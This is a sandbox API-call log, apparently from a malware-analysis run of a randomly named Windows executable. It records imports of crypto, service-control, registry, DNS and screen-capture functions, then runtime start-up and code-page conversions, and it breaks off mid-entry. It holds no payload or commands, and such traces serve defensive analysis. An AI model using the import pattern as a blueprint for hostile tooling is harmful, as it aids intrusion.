[0089.978] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0089.978] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0089.978] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0089.978] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0089.978] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0089.978] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0089.978] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0089.978] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0089.978] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0089.978] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0089.979] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0089.979] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0089.979] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0089.979] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0089.979] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0089.979] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0089.979] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0089.979] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0089.979] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0089.980] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0089.981] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0089.981] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0089.981] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0089.981] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0089.981] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0089.981] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0089.981] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0089.981] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0089.981] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0089.981] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0096.459] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0096.460] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0096.460] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0096.460] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0096.460] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0096.460] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0096.460] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0096.460] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0096.461] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0096.461] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0096.461] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0096.461] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0096.461] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0096.461] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0096.461] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0096.461] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0096.461] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0096.461] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0096.462] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0096.462] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0096.462] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75600000 [0097.102] GetProcAddress (hModule=0x75600000, lpProcName="GetAdaptersInfo") returned 0x75609263 [0097.102] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0097.927] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0097.927] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0097.927] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0097.927] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x755a0000 [0098.348] GetProcAddress (hModule=0x755a0000, lpProcName="DnsFree") returned 0x755a436b [0098.348] GetProcAddress (hModule=0x755a0000, lpProcName="DnsQuery_W") returned 0x755b572c [0098.348] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0098.348] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0098.349] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0098.349] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0098.349] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0098.349] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0098.349] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0098.349] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0098.349] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0098.349] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0098.350] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0098.350] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0098.350] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0098.350] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754e0000 [0099.175] GetProcAddress (hModule=0x754e0000, lpProcName="atexit") returned 0x754fc544 [0099.175] atexit (param_1=0x870920) returned 0 [0099.182] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f338 | out: lpSystemTimeAsFileTime=0x18f338*(dwLowDateTime=0xff060080, dwHighDateTime=0x1d69ad4)) [0099.182] GetCurrentThreadId () returned 0x138 [0099.182] GetCurrentProcessId () returned 0x414 [0099.182] QueryPerformanceCounter (in: lpPerformanceCount=0x18f330 | out: lpPerformanceCount=0x18f330*=21923770521) returned 1 [0099.370] GetStartupInfoW (in: lpStartupInfo=0x18f2c8 | out: lpStartupInfo=0x18f2c8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0099.383] GetProcessHeap () returned 0x9f0000 [0099.805] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0099.805] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0099.805] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0099.805] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0099.805] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0099.806] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0099.806] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0099.806] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0099.806] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0099.806] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0099.806] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0099.806] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0099.806] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0099.807] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0099.807] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0099.807] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0099.807] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0099.807] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0099.807] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0099.807] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0099.807] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0099.808] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0099.808] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0099.808] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0099.808] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0099.808] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0099.808] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0099.808] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0099.809] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0099.809] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0099.809] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0099.809] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0099.809] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0099.809] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0099.810] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x3bc) returned 0xa0f1c0 [0099.810] GetCurrentThreadId () returned 0x138 [0099.820] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x18) returned 0xa020f0 [0099.820] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x800) returned 0xa0f588 [0099.820] GetStartupInfoW (in: lpStartupInfo=0x18f298 | out: lpStartupInfo=0x18f298*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xe412ae58, hStdError=0x58)) [0099.820] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0099.820] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0099.820] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0099.820] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" " [0099.820] GetEnvironmentStringsW () returned 0xa0fd90* [0099.992] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xaca) returned 0xa10868 [0100.003] FreeEnvironmentStringsW (penv=0xa0fd90) returned 1 [0100.012] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe")) returned 0x3a [0100.012] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x7e) returned 0xa0fd90 [0100.012] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x98) returned 0xa0fe18 [0100.012] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x3e) returned 0xa04e48 [0100.012] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x6c) returned 0xa0feb8 [0100.012] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x6e) returned 0xa0ff30 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x78) returned 0xa02ce0 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x62) returned 0xa0ffa8 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x2e) returned 0xa0aee0 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x48) returned 0xa06a60 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x28) returned 0xa0a8a0 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x1a) returned 0xa0edf8 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x4a) returned 0xa10018 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x72) returned 0xa02d60 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x30) returned 0xa0af18 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x2e) returned 0xa0af50 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x1c) returned 0xa0ee20 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0xd2) returned 0xa10070 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x7c) returned 0xa10150 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x36) returned 0xa101d8 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x3a) returned 0xa04e90 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x90) returned 0xa10218 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x24) returned 0xa0a8d0 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x30) returned 0xa0af88 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x36) returned 0xa102b0 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x48) returned 0xa06ab0 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x52) returned 0xa102f0 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x3c) returned 0xa04ed8 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x82) returned 0xa10350 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x2e) returned 0xa0afc0 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x1e) returned 0xa0ee48 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x2c) returned 0xa0aff8 [0100.013] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x54) returned 0xa103e0 [0100.014] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x52) returned 0xa10440 [0100.014] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x2a) returned 0xa0b030 [0100.014] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x3c) returned 0xa04f20 [0100.014] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x54) returned 0xa104a0 [0100.014] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x24) returned 0xa0a900 [0100.014] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x30) returned 0xa0b068 [0100.014] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x8c) returned 0xa10500 [0100.014] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0xa10868 | out: hHeap=0x9f0000) returned 1 [0100.263] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x800) returned 0xa10598 [0100.274] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x80) returned 0xa10da0 [0100.461] GetLastError () returned 0x0 [0100.461] SetLastError (dwErrCode=0x0) [0100.461] GetLastError () returned 0x0 [0100.461] SetLastError (dwErrCode=0x0) [0100.461] GetLastError () returned 0x0 [0100.461] SetLastError (dwErrCode=0x0) [0100.461] GetACP () returned 0x4e4 [0100.461] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x220) returned 0xa10e28 [0100.461] GetLastError () returned 0x0 [0100.461] SetLastError (dwErrCode=0x0) [0100.461] IsValidCodePage (CodePage=0x4e4) returned 1 [0100.461] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f28c | out: lpCPInfo=0x18f28c) returned 1 [0100.470] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ed54 | out: lpCPInfo=0x18ed54) returned 1 [0100.478] GetLastError () returned 0x0 [0100.478] SetLastError (dwErrCode=0x0) [0100.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x18ead8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0100.486] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ed68 | out: lpCharType=0x18ed68) returned 1 [0100.486] GetLastError () returned 0x0 [0100.486] SetLastError (dwErrCode=0x0) [0100.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x18eaa8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0100.494] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0100.494] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e898, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0100.494] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f068, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÈ®\x12ä¤ò\x18", lpUsedDefaultChar=0x0) returned 256 [0100.495] GetLastError () returned 0x0 [0100.495] SetLastError (dwErrCode=0x0) [0100.495] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.495] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x18eab8, cchWideChar=256 | out: lpWideCharStr=" 